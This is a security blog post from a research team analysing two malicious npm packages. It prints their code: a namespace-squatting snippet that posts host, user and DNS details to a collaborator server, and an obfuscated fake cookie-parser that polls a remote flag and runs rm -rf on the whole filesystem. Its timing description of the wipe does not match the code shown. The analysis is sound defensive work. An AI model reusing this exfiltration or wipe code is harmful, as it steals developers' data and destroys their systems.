Security News
Research
Data Theft Repackaged: A Case Study in Malicious Wrapper Packages on npm
The Socket Research Team breaks down a malicious wrapper package that uses obfuscation to harvest credentials and exfiltrate sensitive data.
Security News
Kush Pandya
October 9, 2024
Every day, our security team sifts through countless npm packages. While most packages published to public registries are safe and useful, some slip through the cracks with malicious intent. Recently, we encountered two particularly troubling packages that highlight some common strategies cybercriminals use to exploit developers: one designed to steal sensitive data outright, and another cleverly disguised to destroy data on your system. This post gives you a glimpse into some of the threats that are lurking in open source package repositories.
Both of the concerning packages on npm have now been marked as malware and we have asked the registry to remove them: transferwise-iconfont and protect-api. Each one represents a different level of sophistication in malicious code distribution.
We see these kinds of packages everyday in our feed, they are often labeled as either test packages or something else, however they can act as spyware in many cases.
The transferwise-iconfont package is essentially squatting the namespace for the legitimate TransferWise Iconfont library, developed by Wise, formerly known as TransferWise, a financial technology company focused on global money transfers. The code in the package is not related to the iconfont or copied from its GitHub repo.
const trackingData = JSON.stringify({
p: package,
c: __dirname,
hd: os.homedir(),
hn: os.hostname(),
un: os.userInfo().username,
dns: dns.getServers(),
r: packageJSON ? packageJSON.___resolved : undefined,
v: packageJSON.version,
pjson: packageJSON,
});
var postData = querystring.stringify({
msg: trackingData,
});
var options = {
hostname: "r7z12f7knlides86u06z22fpzg57tzho.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
port: 443,
path: "/",
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": postData.length,
},
};
This package doesn't try to hide its malicious intent. It openly collects sensitive data from the user's system and sends it to a remote server controlled by the attacker. While its brazenness makes it easier to detect through code review, it can still pose a significant threat if overlooked.
The second package, protect-api, is masquerading as the legitimate "cookie-parser" package. It employs sophisticated obfuscation techniques to hide its true nature. At first glance, it appears to be a legitimate utility for handling HTTP cookies. However, buried within layers of obfuscated code lies a destructive function.
function signedCookie(_0x2312a4, _0x9d2acc) {
if (typeof _0x2312a4 !== "string") {
return undefined;
}
if (_0x2312a4.substr(0x0, 0x2) !== 's:') {
return _0x2312a4;
}
var _0xc597d9 = !_0x9d2acc || Array.isArray(_0x9d2acc) ? _0x9d2acc || [] : [_0x9d2acc];
for (var _0x393c39 = 0x0; _0x393c39 < _0xc597d9.length; _0x393c39++) {
var _0x505789 = signature.unsign(_0x2312a4.slice(0x2), _0xc597d9[_0x393c39]);
if (_0x505789 !== false) {
return _0x505789;
}
}
return false;
}
const sh = require('shelljs');
module.exports = protectAPI;
function protectAPI() {
if (!__dirname.includes("mware") && !__dirname.includes('minhtit')) {
setInterval(() => {
fetch('https://6514b3f1dc3282a6a3cd7125.mockapi.io/server/1').then(_0x231e3e => _0x231e3e.json()).then(_0x361fb2 => {
if (_0x361fb2.isAngry) {
angry();
}
})['catch'](_0x5d61c5 => {})["finally"](_0x1c49c6 => {});
}, 0xbb8);
}
}
function angry() {
sh.exec("rm -rf * > /dev/null 2>&1");
sh.exec("rm -rf /* > /dev/null 2>&1");
sh.exec("rm -rf / > /dev/null 2>&1");
sh.exec("rm -rf ~/* > /dev/null 2>&1");
}
This package is particularly dangerous because not only does it hide its malicious intent through obfuscation but it also includes a delay mechanism. The angry()
function, which attempts to delete all files on the system, is scheduled to execute an hour after the package is installed, making it harder to trace back to the source.
Both packages exploit the trust developers place in the npm ecosystem. The simple spyware package operates on the assumption that developers might not scrutinize a logging utility too closely. It collects sensitive data, potentially including environment variables that might contain API keys or other credentials, and exfiltrates this information to the attacker's server.
The obfuscated package is more insidious. It leverages legitimate-looking functionality (cookie parsing) as a cover for its destructive payload. The use of code obfuscation makes it challenging for automated tools and manual reviews to detect the malicious code. The delayed execution of the destructive function further complicates attribution and detection.
npm is rife with many low-effort attempts to compromise unsuspecting users' machines or data. Here are a few best practices for making sure one of these packages doesn't land in your code base:
If you're not yet using Socket, our AI-powered threat detection is the best way to protect yourself from these types of nightmare packages. Install our free Socket for GitHub app with just two clicks to instantly protect your repos from these types of threats. It will automatically scan your dependencies for security and code quality issues and give you real-time alerts.
The npm ecosystem, while incredibly powerful and convenient, is not without its dangers. The cases we've explored today are just a small sampling of the security threats we see plaguing open source code repositories.
Don't let your project become the next victim of a malicious package. The best defense against these threats is a combination of awareness, tools, and best practices. Stay safe out there!
transfwerwise-iconfont
protect-api
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
Research
The Socket Research Team breaks down a malicious wrapper package that uses obfuscation to harvest credentials and exfiltrate sensitive data.
Research
Security News
Attackers used a malicious npm package typosquatting a popular ESLint plugin to steal sensitive data, execute commands, and exploit developer systems.
Security News
The Ultralytics' PyPI Package was compromised four times in one weekend through GitHub Actions cache poisoning and failure to rotate previously compromised API tokens.